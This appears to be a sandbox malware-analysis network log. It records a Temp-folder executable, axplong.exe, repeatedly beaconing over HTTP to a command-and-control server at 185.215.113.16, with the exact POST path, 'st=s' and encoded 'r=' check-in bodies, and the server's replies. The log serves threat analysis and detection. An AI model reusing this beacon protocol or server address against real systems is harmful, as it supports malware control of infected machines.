                    Sep 27, 2024 01:43:42.041259050 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.041290045 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.042172909 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.267817974 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.267878056 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.269318104 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.488123894 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.488250971 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.592784882 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.593667030 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.598041058 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.598165035 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.598542929 CEST8049747185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.598690033 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.599138021 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:42.603916883 CEST8049747185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:43.312964916 CEST8049747185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:43.313126087 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.313816071 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.319353104 CEST8049747185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:43.547933102 CEST8049747185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:43.548038006 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.713087082 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.718346119 CEST8049747185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:43.718417883 CEST4974780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.722131014 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.727020025 CEST8049748185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:43.727116108 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.740138054 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:43.746316910 CEST8049748185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:44.463896036 CEST8049748185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:44.464042902 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.464926958 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.469769955 CEST8049748185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:44.700664043 CEST8049748185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:44.700757980 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.812294006 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.813118935 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.817419052 CEST8049748185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:44.817526102 CEST4974880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.817966938 CEST8049749185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:44.818089962 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.818308115 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:44.823137045 CEST8049749185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:45.504646063 CEST8049749185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:45.504806042 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:45.505395889 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:45.510226965 CEST8049749185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:45.732218981 CEST8049749185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:45.732322931 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:45.844733000 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:45.845591068 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:46.038037062 CEST8049750185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:46.038126945 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:46.038218975 CEST8049749185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:46.038419008 CEST4974980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:46.062115908 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:46.066936970 CEST8049750185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:46.741004944 CEST8049750185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:46.741134882 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:46.815681934 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:46.820530891 CEST8049750185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:47.039669037 CEST8049750185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:47.039839983 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.156739950 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.157233000 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.161976099 CEST8049750185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:47.162111998 CEST4975080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.162153959 CEST8049751185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:47.162276030 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.162480116 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.167371035 CEST8049751185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:47.881541967 CEST8049751185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:47.881649971 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.883569956 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:47.888358116 CEST8049751185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:48.108424902 CEST8049751185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:48.108480930 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.218681097 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.218977928 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.223851919 CEST8049752185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:48.223870039 CEST8049751185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:48.223978996 CEST4975180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.223995924 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.224610090 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.229388952 CEST8049752185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:48.936373949 CEST8049752185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:48.936450958 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.937423944 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:48.944484949 CEST8049752185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:49.170749903 CEST8049752185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:49.170918941 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:49.428211927 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:49.432434082 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:49.440924883 CEST8049753185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:49.441021919 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:49.441677094 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:49.442594051 CEST8049752185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:49.442651987 CEST4975280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:49.446414948 CEST8049753185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:50.147353888 CEST8049753185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:50.147532940 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.148298025 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.153093100 CEST8049753185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:50.381314993 CEST8049753185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:50.381436110 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.483016014 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.483572006 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.488723040 CEST8049754185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:50.488735914 CEST8049753185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:50.488888025 CEST4975380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.489147902 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.489147902 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:50.494396925 CEST8049754185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:51.199959040 CEST8049754185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:51.200087070 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.200833082 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.205642939 CEST8049754185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:51.435882092 CEST8049754185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:51.435947895 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.545911074 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.546555042 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.551399946 CEST8049754185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:51.551428080 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:51.551465034 CEST4975480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.551537991 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.551899910 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:51.556910992 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.249130964 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.253449917 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.254076004 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.258841038 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.477385044 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.479878902 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.914470911 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.914868116 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.919747114 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.919780016 CEST8049755185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:52.919826031 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.919850111 CEST4975580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.923703909 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:52.928610086 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.636210918 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.636363029 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.637239933 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.642019987 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.869591951 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.869756937 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.984966993 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.985284090 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.990186930 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.990314960 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.990462065 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.992795944 CEST8049756185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:53.992856979 CEST4975680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:53.995269060 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.714360952 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.714441061 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:54.715310097 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:54.720134974 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.938955069 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:54.939120054 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.045618057 CEST4975780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.045945883 CEST4975880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:55.050976038 CEST8049757185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:55.050992966 CEST8049758185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:55.051044941 CEST4975780192.168.2.8185.215.113.16
                    • 185.215.113.16
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.8 | 49710 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:03.610220909 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:04.327598095 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:04.384794950 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:04.615184069 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.8 | 49711 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:04.787873030 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:05.448733091 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:05.449692011 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:05.676136971 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.8 | 49712 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:05.791894913 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:06.483901024 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:06.488574982 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:06.712541103 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.8 | 49713 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:06.840336084 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:07.559001923 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:07.605623960 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:07.837276936 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.8 | 49714 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:07.981076002 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:08.669446945 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:08.670816898 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:08.902663946 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.8 | 49715 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:09.020642996 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:09.714042902 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:09.715029955 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:09.937987089 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
